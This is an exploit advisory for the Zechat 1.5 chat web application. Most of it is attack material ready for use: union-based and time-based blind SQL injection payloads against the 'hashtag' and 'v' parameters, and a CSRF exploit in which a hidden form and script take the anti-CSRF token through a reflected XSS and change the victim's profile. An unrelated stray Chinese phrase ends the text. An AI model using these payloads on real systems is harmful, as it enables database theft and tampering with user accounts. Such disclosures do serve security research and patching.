# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery # Date: 2018-05-22 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: https://bylancer.com # Version: 1.5 # Tested on: Kali linux ==================================================== # POC 1 : SQLi : Parameter : hashtag type : Union based http://test.com/chat/hashtag?hashtag=[SQL] # test : http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23 # Payload : -1' UNION SELECT NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_schema=schema()%23 ==================================================== Parameter : v type : time-based blind test.com/chat/me?action=edit&v=[SQL] # test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23 # Payload : AND sleep(10)%23 ==================================================== # POC 2 : CSRF : # CSRF vulnerability allows attacker to change user's information. In this script we have anti-csrf which we can't change user's information without token. So we use 'hashtag' parameter to set our encoded payload and bypass csrf protection : chat/hashtag?hashtag=[We have Reflected XSS here] # Exploit : <form action="http://test.com/chat/data_settings.php" method="POST"> <input type="hidden" name="csrf_token" value="" /> <input type="hidden" name="Wall" value="Hello would you like to be my friend" /> <input type="hidden" name="user" value="lord225" /> <input type="hidden" name="name" value="test" /> <input type="hidden" name="mail" value="d3code.n@gmail.com" /> <input type="hidden" name="website" value="test" /> <input type="hidden" name="sex" value="male" /> <input type="hidden" name="country" value="------" /> <input type="hidden" name="day" value="" /> <input type="hidden" name="month" value="" /> <input type="hidden" name="year" value="" /> <input type="hidden" name="Language" value="en" /> </form> <script> var token = ''; var req = new XMLHttpRequest(); req.onreadystatechange = function(){ if(this.readyState == 4 && this.status == 200){ var setPage = this.responseXML; token = setPage.forms[1].elements[0].value; // get token console.log(token); } } req.open("POST","/chat/settings",true); req.setRequestHeader("content-type","application/x-www-form-urlencoded"); req.responseType = "document"; req.send(); document.forms[0].elements[0].value = token; // set token to our form document.forms[0].submit(); </script> =====================================================
体验盒子
